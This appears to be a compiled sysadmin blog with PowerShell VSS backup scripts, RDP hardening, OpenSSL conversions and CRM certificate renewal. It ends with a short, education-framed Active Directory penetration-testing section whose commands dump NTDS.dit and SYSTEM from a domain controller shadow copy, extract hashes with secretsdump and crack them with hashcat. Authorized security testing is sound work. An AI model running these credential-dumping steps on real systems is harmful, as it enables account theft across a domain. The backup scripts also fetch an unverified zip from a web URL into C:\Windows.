PowerShell: Scheduled Task to Backup Local Files to remote UNC Path

Set Script Execution Policy on Host
PS H:\> Set-ExecutionPolicy RemoteSigned

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution
policy?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
Create a Windows Scheduled Task that launches the script (a sketch of registering the task follows).
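Below is a minimal sketch of registering such a task from an elevated session, assuming the ScheduledTasks module of Windows Server 2012 / Windows 8 or later, a nightly 1:00 AM trigger, and the script path used in the next step; adjust the trigger and account to your environment:

# Hypothetical task registration; the trigger time and account are placeholders
$action    = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-ExecutionPolicy Bypass -File "C:\Scripts\File_Copy_Script_V0.15.ps1"'
$trigger   = New-ScheduledTaskTrigger -Daily -At "1:00AM"
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName 'Backup Local Files to UNC' -Action $action -Trigger $trigger -Principal $principal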
Create a C:\Scripts\File_Copy_Script_V0.15.ps1 file with this content:
<#
.Description File_Copy_Script Version: 0.15

Purpose: this PowerShell Script is to efficiently mirror large batches of files using Emcopy in conjunction with Volume Shadow Services

Current Features:
1. Check for any errors on the Sources or Destinations and generate a report of any extra spaces in UNC
2. Create a snapshot of the source volume using Shadow Copy to capture any locked files
3. Execute emcopy to mirror the source to its corresponding destination with a time stamp variance allowance of 2 seconds for speed and resiliency
4. Sample the copied files to 'spot check' any time stamp variances
5. Execute in the context of an Administrator

Features planned for development:
6. Enable Volume Shadow Copy (VSS) at Source machines if it has been disabled, and reverse the action when done with copying
7. Trigger Remote Powershell to launch execution from a middle server (a "jump box" that is not a source nor destination)
if the provided Source is detected as a Universal Naming Convention (UNC) path instead of a local file system (LFS) path

Limitations:
1. This iteration requires that script is triggered from a local Windows machine with Internet access (no proxies)
2. Source must be LFS and Destination could either be LFS or UNC
#>

# Specify Source and Destination
$source="D:\Test" # Must be a LFS path
$destination="\\FILESHERVER01\Test"
$block="$source $destination"

# Emcopy switches
$switches="/o /secforce /de /sd /c /r:0 /th 32 /s /purge /sdd"
<# Switch explanations
/s copies sub directories
/purge removes files and directories from the destination that do not exist in the source.
/sdd forces the target directories dates to be synchronized with the source directory.
/de compares both file size and last modification time when deciding to update a file; updates it if either has changed.
/cm md5 - checks the file content after copying using an MD5 comparison of the source and destination.
/o copies the file's owner; without this, the account used for the copy becomes the owner.
/secforce overwrites the destination security settings with the source security settings (copies security settings)
/sd preserves security; the file isn't copied if an error occurs while applying security settings.
/th 32 - Uses 32 threads, default is 64
/r:0 retries zero times
/w:0 is the wait time in seconds between retries
/c will allow the process to continue after the retries
/log:filename option allows to redirect the console messages to a new file.
/log+:filename option appends the new messages to an existing file.
#>

# Initialize log files
$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\emcopy_logs"
$logFile="$logPath\emcopy-log-$dateStamp.txt"
$log=" /LOG+:$logFile"
$lockedFilesReport="$logPath\_locked-files-log-$dateStamp.txt"
$pathErrorsLog="$logPath`\_path-errors-log-$dateStamp.txt"

# Init other variables
$sampleSize=1000;
$GLOBAL:shadowMount="C:\shadowcopy"

################################## Executing Program as an Administrator ####################################
# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "White"
clear-host
}
else
{
# We are not running "as Administrator" - so relaunch as administrator

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

Write-Host -NoNewLine "Running as Administrator..."
################################## Executing Program as an Administrator ####################################

################################## Commence Programming Sequence ####################################
New-Item -ItemType Directory -Force -Path $logpath;
"Executing copying tasks..."

function createShadow(){
[cmdletbinding()]
param(
[string]$targetVolume="C:\"
)
if (!($targetVolume -like "*\")){$targetVolume+="\"}
$shadowCopyClass=[WMICLASS]"root\cimv2:win32_shadowcopy"
$thisSnapshot = $shadowCopyClass.Create($targetVolume, "ClientAccessible")
$thisShadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $thisSnapshot.ShadowID }
$thisShadowPath = $thisShadow.DeviceObject + "\"
C:
cmd /c mklink /d $shadowMount $thisShadowPath
"Shadow of $targetVolume has been made and it's accessible at this local file system (LFS): $shadowMount."
#copyLockedFiles; # this function is to be developed: retrieve lock files list, copy each item on list
#deleteShadow $thisShadow $thisShadowMount

# Export variables
$GLOBAL:shadow=$thisShadow;
}

function deleteShadow(){
# Remove symlink
(Get-Item $shadowMount).Delete()

# delete single instance of volume snapshots
$shadow.Delete()

# Delete all instances of volume snapshots
#Get-WmiObject Win32_ShadowCopy | % {$_.delete()}

"Shadow link $shadowMount has been removed."
}

function logPathError($pathError){
Add-Content $pathErrorsLog "$pathError";
}

function validateDirectory($dirToValidate){
if(Test-Path -Path $dirToValidate){return $True}
else{return $False;}
}

function createDirectory($dir){
# Create folder if it doesn't exist
if(!(validateDirectory $dir)){
New-Item -path $dir -type directory
}
}

function validateSourceAndDestination($thisblock){
$spacesCount=($thisblock.Split(' ')).Count-1
if ($spacesCount -eq 1){
$GLOBAL:source,$GLOBAL:destination=$thisblock.split(' ');
$sourceTest=validateDirectory $source
$destinationTest=validateDirectory $destination
if ($sourceTest -and $destinationTest){
return $True;
}
else {
if (!($sourceTest)){
logPathError "Source: $source";
return $False;
}
if (!($destinationTest)){
$createDestinationPath=(Read-Host -Prompt "Destination: $destination does not exist.`nType 'y' or 'yes' to create.");
if ($createDestinationPath -like 'yes' -or $createDestinationPath -like 'y'){
createDirectory $destination;
return $True;
}
else{
logPathError "Destination: $destination";
return $False
}
}
return $False;
}
}
else {
logPathError $thisblock;
return $False;
}
}

function translateSource{
param(
[string]$uncPath
)
$uri = new-object System.Uri($uncPath)
$thisLocalPath=$uri.LocalPath
#$thisHost=$uri.Host
$GLOBAL:sourceVolume="$((Get-Item $thisLocalPath).PSDrive.Name)`:"
$GLOBAL:translatedSource=$thisLocalPath -replace "$sourceVolume", $shadowMount
}

function sampleTimeStamp{
$sourceFiles=Get-ChildItem $source -recurse | ? { !($_.PsIsContainer -and $_.FullName -notmatch 'archive') } | get-random -count $sampleSize | % {$_.FullName}
$commonDenominatingPaths=$sourceFiles | %{$_.replace($source,'')}
$destinationFiles=$commonDenominatingPaths | %{"$destination"+"$_";}
$badStamps=0;

"Checking a sample of $sampleSize for any time stamp inaccuracy..."

for ($i=0;$i -lt $sourceFiles.length;$i++){
$sourceFile=$sourceFiles[$i];
$destinationFile=$destinationFiles[$i];
$sourceTimeStamp=(gi $sourceFile).LastWriteTime;
$destinationTimeStamp=(gi $destinationFile).LastWriteTime;
if ($sourceTimeStamp -eq $destinationTimeStamp){
#$output+="`r`n$destinationFile is GOOD";
}
else {
$output+="`r`n$destinationFile is BAD";
$badStamps++;
}
}
$output="`r`n`r`n------------$((($sourceFiles.Length-$badStamps)/$sourceFiles.Length).tostring('P')) of the files in a sample of $($sourceFiles.Length) have accurate time stamps--------------`n"+$output;
Add-Content $logFile $output;
}

function checkDiskFree{
<#
Excerpt from http://technet.microsoft.com/en-us/library/ee692290(WS.10).aspx:

"For volumes less than 500 megabytes, the minimum is 50 megabytes of free space.
For volumes more than 500 megabytes, the minimum is 320 megabytes of free space.
It is recommended that least 1 gigabyte of free disk space on each volume if the volume size is more than 1 gigabyte."

#>

# Import variables
$thisNode="localhost"
$thisVolume=$sourceVolume

# Obtain disk information
$diskObject = Get-WmiObject Win32_LogicalDisk -ComputerName $thisNode -Filter "DeviceID='$thisVolume'"
$diskFree=[Math]::Round($diskObject.FreeSpace / 1MB)
$diskSize=[Math]::Round($diskObject.Size / 1MB)

switch ($diskSize){
{$diskSize -ge 1024} {if ($diskFree -gt 1024){$feasible=$True}else{$feasible=$False}; break;}
{$diskSize -ge 500} {if ($diskFree -gt 320){$feasible=$True}else{$feasible=$False}; break;}
{$diskSize -lt 500} {if ($diskFree -gt 50){$feasible=$True}else{$feasible=$False}; break;}
}

return $feasible
}

function expandZipfile($file, $destination){
$shell = new-object -com shell.application
$zip = $shell.NameSpace($file)

foreach($item in $zip.items()){
$shell.Namespace($destination).copyhere($item)
}
}

function installEmcopy{
$emcopyIsInstalled=(Get-Command emcopy.exe -ErrorAction SilentlyContinue) # Deterministic check on whether emcopy is already available on this system
if (!($emcopyIsInstalled)){
$tempDir="C:\Temp";
$extractionDir="C:\Windows"
$source = "https://kimconnect.com/wp-content/uploads/2019/08/emcopy.zip";
$destinationFile = "$tempDir\emcopy.zip";
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path $tempDir
New-Item -ItemType Directory -Force -Path $extractionDir
$webclient = New-Object System.Net.WebClient;
$WebClient.DownloadFile($source,$destinationFile);
expandZipfile $destinationFile -Destination $extractionDir
}else{
"EMCOPY is currently available in this system.`n";
}
}

function startEmcopy{
param(
[string]$sourceAndDestination
)

Add-Content $logFile "`n`n`n---------------------------------Job Started: $dateStamp---------------------------------";
$totalTime=0;
"Emcopy has started..."
$stopWatch= [System.Diagnostics.Stopwatch]::StartNew()
try{
invoke-expression "emcopy.exe $sourceAndDestination $switches $log";
}
catch{
# Record the error into the log and continue
Add-Content $logFile "ERROR: $_";
}
$elapsedSeconds=$stopWatch.Elapsed.TotalSeconds;
$elapsedDisplay=([timespan]::fromseconds($elapsedSeconds)).ToString().Split('.')[0]
$totalTime+=$elapsedSeconds;
"`r`nEmcopy process is finished. Log is generated here: $log"
$timeDisplay = ([timespan]::fromseconds($totalTime)).ToString()
Add-Content $logFile "`r`n------------------------------Total Time Elapsed: $timeDisplay------------------------------";
}

Function proceed{
"Powershell version detected: $($PSVersionTable.PSVersion.Major)`.$($PSVersionTable.PSVersion.Minor)"
if (validateSourceAndDestination $block){
translateSource $source;
#"Shadow Copy source: $tranlatedSource`nDestination: $destination";
$translatedBlock="$translatedSource $destination";
if (checkDiskFree){
createShadow $sourceVolume;
installEmcopy;
startEmcopy $translatedBlock;
deleteShadow;
sampleTimeStamp;
"Program is completed."
"Log for this activity has been generated at $logFile"
}else{"Not enough disk space to create a VSS snapshot.`r`Program is aborted."}
}
}

proceed;
################################## Main Programming Sequence ####################################

# cmd /c pause | out-null;

PowerShell: Use EMCOPY to Mirror a Directory

# Purpose: this PowerShell snippet is to demonstrate the use of Emcopy

$source="C:\Users\tester\Desktop\Clients"
$destination="C:\Users\tester\Desktop\Test"
#$switches="/o /secforce /s /de /sd /c /r:0 /th 32 /cm md5 /purge /sdd"
$switches="/o /secforce /de /sd /c /r:0 /th 32 /s /purge /sdd"
<# Switch explanations
/s copies sub directories
/purge removes files and directories from the destination that do not exist in the source.
/sdd forces the target directories dates to be synchronized with the source directory.
/de compares both file size and last modification time when deciding to update a file; updates it if either has changed.
/cm md5 - checks the file content after copying using an MD5 comparison of the source and destination.
/o copies the file's owner; without this, the account used for the copy becomes the owner.
/secforce overwrites the destination security settings with the source security settings (copies security settings)
/sd preserves security; the file isn't copied if an error occurs while applying security settings.
/th 32 - Uses 32 threads, default is 64
/r:0 retries zero times
/w:0 is the wait time in seconds between retries
/c will allow the process to continue after the retries
/log:filename option allows to redirect the console messages to a new file.
/log+:filename option appends the new messages to an existing file.
#>

$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\emcopy_logs"
$logFile="$logPath\robocopy-log-$dateStamp.txt"
$log=" /LOG+:$logFile"


# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
}
else
{
"Relaunching as an Administrator.";

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

# Run your code that needs to be elevated here
Write-Host -NoNewLine "Running as Administrator..."
#$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

function installEmcopy{
$emcopyIsInstalled=(Get-Command emcopy.exe -ErrorAction SilentlyContinue) # Deterministic check on whether emcopy is already available on this system
if (!($emcopyIsInstalled)){
$tempDir="C:\Temp";
$extractionDir="C:\Windows"
$source = "https://kimconnect.com/wp-content/uploads/2019/08/emcopy.zip";
$destinationFile = "$tempDir\emcopy.zip";
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path $tempDir
New-Item -ItemType Directory -Force -Path $extractionDir
$webclient = New-Object System.Net.WebClient;
$WebClient.DownloadFile($source,$destinationFile);
Expand-Archive -LiteralPath $destinationFile -DestinationPath $extractionDir
}else{
"EMCOPY is currently available in this system.`n";
}
}

function startEmcopy{
New-Item -ItemType Directory -Force -Path $logPath;
"Confirm this statement:`nemcopy64.exe $source $destination $switches $log";
pause;
invoke-expression "emcopy64.exe $source $destination $switches $log"
"emcopy process is finished. Log is generated here: $log"
pause;
}

installEmcopy;
startEmcopy;

PowerShell: File Copying Script Version 0.14

<#
.Description File_Copy_Script Version: 0.14

Purpose: this PowerShell Script is to efficiently mirror large batches of files using Robocopy in conjunction with Volume Shadow Services

Current Features:
1. Check for any errors on the Sources or Destinations and generate a report of any extra spaces in UNC
2. Create a snapshot of the source volume using Shadow Copy to capture any locked files
3. Execute robocopy to mirror the source to its corresponding destination with a time stamp variance allowance of 2 seconds for speed and resiliency
4. Sample the copied files to 'spot check' any time stamp variances

Features planned for development:
5. Execute in the context of a Domain Administrator
6. Enable Volume Shadow Copy (VSS) at Source machines if it has been disabled, and reverse the action when done with copying
7. Trigger Remote Powershell to launch execution from a middle server (a "jump box" that is not a source nor destination)
if the provided Source is detected as a Universal Naming Convention (UNC) path instead of a local file system (LFS) path

Limitations:
- Require robocopy version XP016 or higher
- Only works if the source is LFS and destination is UNC
#>


$source="C:\Users\yamama\Desktop\test" # LFS path, only
$destination="\\FILESHERVER01\test" # UNC path, only
$block="$source $destination"

$switches="/MIR /SEC /DCOPY:T /R:0 /W:0 /XO /FFT /TBD /NP "
$dateStamp = Get-Date -Format "yyyy-MM-dd-hhmmss"
$scriptName=$MyInvocation.MyCommand.Path
$scriptPath=Split-Path -Path $scriptName
$logPath="$scriptPath\robocopy_logs"
$logFile="$logPath\robocopy-log-$dateStamp.txt"
$log="/LOG+:$logFile"
$lockedFilesReport="$logPath\_locked-files-log-$dateStamp.txt"
$pathErrorsLog="$logPath`\_path-errors-log-$dateStamp.txt"
$sampleSize=1000;
$GLOBAL:shadowMount="C:\shadowcopy"

# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
{
# We are running "as Administrator" - so change the title and background color to indicate this
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
}
else
{
# We are not running "as Administrator" - so relaunch as administrator

# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";

# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;

# Indicate that the process should be elevated
$newProcess.Verb = "runas";

# Start the new process
[System.Diagnostics.Process]::Start($newProcess);

# Exit from the current, unelevated, process
exit
}

# Run your code that needs to be elevated here
Write-Host -NoNewLine "Now Running as Administrator..."
#$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

New-Item -ItemType Directory -Force -Path $logpath;
"Executing copying tasks..."

function createShadow(){
[cmdletbinding()]
param(
[string]$targetVolume="C:\"
)
if (!($targetVolume -like "*\")){$targetVolume+="\"}
$shadowCopyClass=[WMICLASS]"root\cimv2:win32_shadowcopy"
$thisSnapshot = $shadowCopyClass.Create($targetVolume, "ClientAccessible")
$thisShadow = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $thisSnapshot.ShadowID }
$thisShadowPath = $thisShadow.DeviceObject + "\"
cmd /c mklink /d $shadowMount $thisShadowPath
"Shadow of $targetVolume has been made and it's accessible at this local file system (LFS): $shadowMount."
#copyLockedFiles; # this function is to be developed: retrieve lock files list, copy each item on list
#deleteShadow $thisShadow $thisShadowMount

# Export variables
$GLOBAL:shadow=$thisShadow;
}

function deleteShadow(){
# Remove symlink
(Get-Item $shadowMount).Delete()

# delete single instance of volume snapshots
$shadow.Delete()

# Delete all instances of volume snapshots
#Get-WmiObject Win32_ShadowCopy | % {$_.delete()}

"Shadow link $shadowMount has been removed."
}

function logPathError($pathError){
Add-Content $pathErrorsLog "$pathError";
}

function validateDirectory($dirToValidate){
if(Test-Path -Path $dirToValidate){return $True}
else{return $False;}
}

function createDirectory($dir){
# Create folder if it doesn't exist
if(!(validateDirectory $dir)){
New-Item -path $dir -type directory
}
}

function validateSourceAndDestination($thisblock){
$spacesCount=($thisblock.Split(' ')).Count-1
if ($spacesCount -eq 1){
$GLOBAL:source,$GLOBAL:destination=$thisblock.split(' ');
$sourceTest=validateDirectory $source
$destinationTest=validateDirectory $destination
if ($sourceTest -and $destinationTest){
return $True;
}
else {
if (!($sourceTest)){
logPathError "Source: $source";
return $False;
}
if (!($destinationTest)){
$createDestinationPath=(Read-Host -Prompt "Destination: $destination does not exist.`nType 'y' or 'yes' to create.");
if ($createDestinationPath -like 'yes' -or $createDestinationPath -like 'y'){
createDirectory $destination;
return $True;
}
else{
logPathError "Destination: $destination";
return $False
}
}
return $False;
}
}
else {
logPathError $thisblock;
return $False;
}
}

function translateSource{
param(
[string]$uncPath
)
$uri = new-object System.Uri($uncPath)
$thisLocalPath=$uri.LocalPath
#$thisHost=$uri.Host
$GLOBAL:sourceVolume="$((Get-Item $thisLocalPath).PSDrive.Name)`:"
$GLOBAL:translatedSource=$thisLocalPath -replace "$sourceVolume", $shadowMount
}

function reportLockedFiles($unc){
$files=Get-ChildItem -Path $unc -Recurse | where { ! $_.PSIsContainer }| % {$_.FullName}
#$x=$files[0]
#simulateLockedFile "$x"
$lockedFiles=$files | % { if(isFileLocked $_){$_; } }
if ($lockedFiles){
createDirectory $logPath;
Add-Content $lockedFilesReport $lockedFiles;
}
#$lockedFile.Close();
}

function startRobocopy{
param(
[string]$sourceAndDestination
)
Add-Content $logFile "`n`n`n---------------------------------Job Started: $dateStamp---------------------------------";
$totalTime=0;
"Robocopy has started..."
$stopWatch= [System.Diagnostics.Stopwatch]::StartNew()
try{
invoke-expression "robocopy $sourceAndDestination $switches $log | Out-Null";
#invoke-expression "robocopy $item $switches $log | Out-Null";
}
catch{
# Record the error into the log and continue
Add-Content $logFile "ERROR: $_";
}
#"Checking locked files in $source..."
#reportLockedFiles $source
$elapsedSeconds=$stopWatch.Elapsed.TotalSeconds;
$elapsedDisplay=([timespan]::fromseconds($elapsedSeconds)).ToString().Split('.')[0]
#Add-Content $logFile "Block Time Elapsed: $elapsedDisplay";
$totalTime+=$elapsedSeconds;
"`r`nRobocopy is done."
$timeDisplay = ([timespan]::fromseconds($totalTime)).ToString()
#$timeDisplay = $timeString.substring(0, $timeString.lastIndexOf("."));
Add-Content $logFile "`r`n------------------------------Total Time Elapsed: $timeDisplay------------------------------";
}

function sampleTimeStamp{
$sourceFiles=Get-ChildItem $source -recurse | ? { !($_.PsIsContainer -and $_.FullName -notmatch 'archive') } | get-random -count $sampleSize | % {$_.FullName}
$commonDenominatingPaths=$sourceFiles | %{$_.replace($source,'')}
$destinationFiles=$commonDenominatingPaths | %{"$destination"+"$_";}
$badStamps=0;

"Checking a sample of $sampleSize for any time stamp inaccuracy..."

for ($i=0;$i -lt $sourceFiles.length;$i++){
$sourceFile=$sourceFiles[$i];
$destinationFile=$destinationFiles[$i];
$sourceTimeStamp=(gi $sourceFile).LastWriteTime;
$destinationTimeStamp=(gi $destinationFile).LastWriteTime;
if ($sourceTimeStamp -eq $destinationTimeStamp){
#$output+="`r`n$destinationFile is GOOD";
}
else {
$output+="`r`n$destinationFile is BAD";
$badStamps++;
}
}
$output="`r`n`r`n------------$((($sourceFiles.Length-$badStamps)/$sourceFiles.Length).tostring('P')) of the files in a sample of $($sourceFiles.Length) have accurate time stamps--------------`n"+$output;
Add-Content $logFile $output;
}

function checkDiskFree{
<#
Excerpt from http://technet.microsoft.com/en-us/library/ee692290(WS.10).aspx:

"For volumes less than 500 megabytes, the minimum is 50 megabytes of free space.
For volumes more than 500 megabytes, the minimum is 320 megabytes of free space.
It is recommended that least 1 gigabyte of free disk space on each volume if the volume size is more than 1 gigabyte."

#>

# Import variables
$thisNode="localhost"
$thisVolume=$sourceVolume

# Obtain disk information
$diskObject = Get-WmiObject Win32_LogicalDisk -ComputerName $thisNode -Filter "DeviceID='$thisVolume'"
$diskFree=[Math]::Round($diskObject.FreeSpace / 1MB)
$diskSize=[Math]::Round($diskObject.Size / 1MB)

switch ($diskSize){
{$diskSize -ge 1024} {if ($diskFree -gt 1024){$feasible=$True}else{$feasible=$False}; break;}
{$diskSize -ge 500} {if ($diskFree -gt 320){$feasible=$True}else{$feasible=$False}; break;}
{$diskSize -lt 500} {if ($diskFree -gt 50){$feasible=$True}else{$feasible=$False}; break;}
}

return $feasible
}

Function proceed{
if (validateSourceAndDestination $block){
translateSource $source;
#"Shadow Copy source: $tranlatedSource`nDestination: $destination";
$translatedBlock="$translatedSource $destination";
if (checkDiskFree){
createShadow $sourceVolume;
startRobocopy $translatedBlock;
deleteShadow;
sampleTimeStamp;
"Program is completed."
"Log for this activity has been generated at $logFile"
}else{"Not enough disk space to create a VSS snapshot.`r`Program is aborted."}
}
}

proceed;
pause;

Securing Windows Remote Desktop Services

secpol.msc > Local Policies > User Rights Assignments > double-click “Allow Log on through Remote Desktop Services” > remove Administrators and Remote Desktop Users > Add a customized group and/or users

gpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security > change these settings (a registry-based sketch follows this list):
– Set client encryption level = High
– Require secure RPC communication = Enabled
– Require use of specific security layer for remote (RDP) connections = SSL
– Require user authentication for remote connections by using Network Level Authentication = Enabled
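
As an alternative to clicking through gpedit.msc, here is a minimal sketch of setting the equivalent values on the local RDP-Tcp listener via the registry (an assumption: the default RDP-Tcp listener is in use, and any domain GPO will override these at the next refresh):

$rdpTcp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
Set-ItemProperty -Path $rdpTcp -Name 'MinEncryptionLevel' -Value 3   # High client encryption level
Set-ItemProperty -Path $rdpTcp -Name 'SecurityLayer' -Value 2        # SSL (TLS) security layer
Set-ItemProperty -Path $rdpTcp -Name 'UserAuthentication' -Value 1   # Require Network Level Authentication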

PowerShell: Convert Between Various SSL Certificate Formats

# Install Choco (look for instructions in this blog)

# Install openssl.light
choco install openssl.light -y
cd "C:\Program Files\OpenSSL\bin"

# Convert PEM to DER
openssl x509 -outform der -in certificate.pem -out certificate.der

# Convert PEM to P7B
openssl crl2pkcs7 -nocrl -certfile certificate.cer -out certificate.p7b -certfile CACert.cer

# Convert PEM to PFX
openssl pkcs12 -export -out certificate.pfx -inkey privateKey.key -in certificate.crt -certfile CACert.crt

# Convert DER to PEM
openssl x509 -inform der -in certificate.cer -out certificate.pem

# Convert P7B to PEM
openssl pkcs7 -print_certs -in certificate.p7b -out certificate.cer

# Convert P7B to PFX (two steps: extract the certs, then build the PFX)
openssl pkcs7 -print_certs -in certificate.p7b -out certificate.cer
# then
openssl pkcs12 -export -in certificate.cer -inkey privateKey.key -out certificate.pfx -certfile CACert.cer

# Convert PFX to PEM
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes

# Example:
PS C:\Program Files\OpenSSL\bin> .\openssl pkcs12 -in C:\Users\Test\Desktop\star_kimconnect_com.pfx -out C:\Users\Test\Desktop\star_kimconnect_com.cer -nodes
Enter Import Password:
# Done
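
If the end goal of a conversion is to load the resulting PFX into Windows, here is a small sketch using the built-in PKI module (the file path below is just the example from above):

# Hypothetical import of a converted PFX into the Local Machine Personal store
$pfxPassword = Read-Host -AsSecureString -Prompt 'PFX password'
Import-PfxCertificate -FilePath 'C:\Users\Test\Desktop\star_kimconnect_com.pfx' -CertStoreLocation Cert:\LocalMachine\My -Password $pfxPassword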

Renew or Replace a SSL Certificate in Dynamics CRM

Error Message:
“Exchange Online Security Certificate Expiration Please update your certificate or Exchange Online integration will stop functioning in $count days.”

Resolution (steps):

1. Apply the new cert on the ADFS server
a. Obtain new cert and place it into C:\certs directory
b. Install new cert to local machine certificates store using MMC: Run certlm.msc > Personal > right-click Certificates > All Tasks > Import > Next > Browse > navigate to C:\certs > select the new cert > Open > Next > Next > OK > OK
c. Set cert access permissions: Run certlm.msc > Personal > Certificates > right-click new cert > All Tasks > Manage Private Keys > Add > search and select appropriate service accounts (‘AppPool user account’: READ, ‘ADFS service user account’: FULL) > OK > put a check mark next to appropriate permissions for each account > OK > OK
d. Make a backup of the old cert ***
e. Remove old cert from local machine certificates store using MMC: Run certlm.msc > Personal > Certificates > right-click on the old cert > Delete > Yes ***
f. Set Cert using AD FS Management Console:
– Run %windir%\ADFS\Microsoft.IdentityServer.msc: AD FS > Service > right-click Certificates > Set Service Communications Certificate > select the newly imported Cert > OK
– AD FS > Trust Relationship > Relying Party Trusts > right-click CRM Claims Relying Party > Update from Federation Metadata

2. Apply the new cert on Dynamics CRM Server’s IIS
a. Obtain new cert and place it into C:\certs directory
b. Remove old cert from local machine certificates store using MMC: Run certlm.msc > Personal > Certificates > right-click on the old cert > Delete > Yes
c. Install new cert to local machine certificates store using MMC: Run certlm.msc > Personal > right-click Certificates > All Tasks > Import > Next > Browse > navigate to C:\certs > select the new cert > Open > Next > Next > OK > OK >
d. Set cert access permissions: Run certlm.msc > Personal > Certificates > right-click new cert > All Tasks > Manage Private Keys > Add > search and select appropriate service accounts (‘AppPool user account’: READ, ‘ADFS service user account’: FULL) > OK > put a check mark next to appropriate permissions for each account > OK > OK
e. Apply new cert toward IIS: Run inetmgr.exe > Sites > Microsoft Dynamics CRM > click on Bindings on the right side panel > select https > Edit > click Select > highlight the newly imported cert > OK > OK > Close
f. Reset IIS: run iisreset

3. Apply new cert within CRM using Deployment Manager
a. Run “%PROGRAMFILES%\Microsoft Dynamics CRM\tools\Microsoft.Crm.DeploymentManager.exe” > Configure Claims-Based Authentication > Next > Next > Select > highlight the new Cert > OK > Next > Next > OK
b. Reset IIS: run iisreset
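
Before pointing ADFS, IIS, and Deployment Manager at the new cert, it can help to confirm its thumbprint and expiry. A minimal, read-only sketch against the Local Machine Personal store (the same store certlm.msc displays):

Get-ChildItem Cert:\LocalMachine\My |
Where-Object { $_.NotAfter -gt (Get-Date) } |
Sort-Object NotAfter |
Format-Table Subject, Thumbprint, NotAfter -AutoSize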

Penetration Testing of Active Directory

Foreword: the following information is intended as educational content and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions for evasive techniques, as those run counter to the character of ethical hacking.

1. Grab the NTDS.dit and systemhive from a domain controller

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Reg SAVE HKLM\SYSTEM C:\systemhive

2. Extract the hashes using impacket (https://github.com/SecureAuthCorp/impacket)

git clone https://github.com/SecureAuthCorp/impacket.git
python setup.py install
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract

3. Decode the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat (https://hashcat.net/wiki)
hashcat -m 1000 -w 3 -a 0 -p : --session=all --username -o ~/pentest/pentest.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds ~/pentest.txt --potfile-path ~/pentest/hashcat.pot
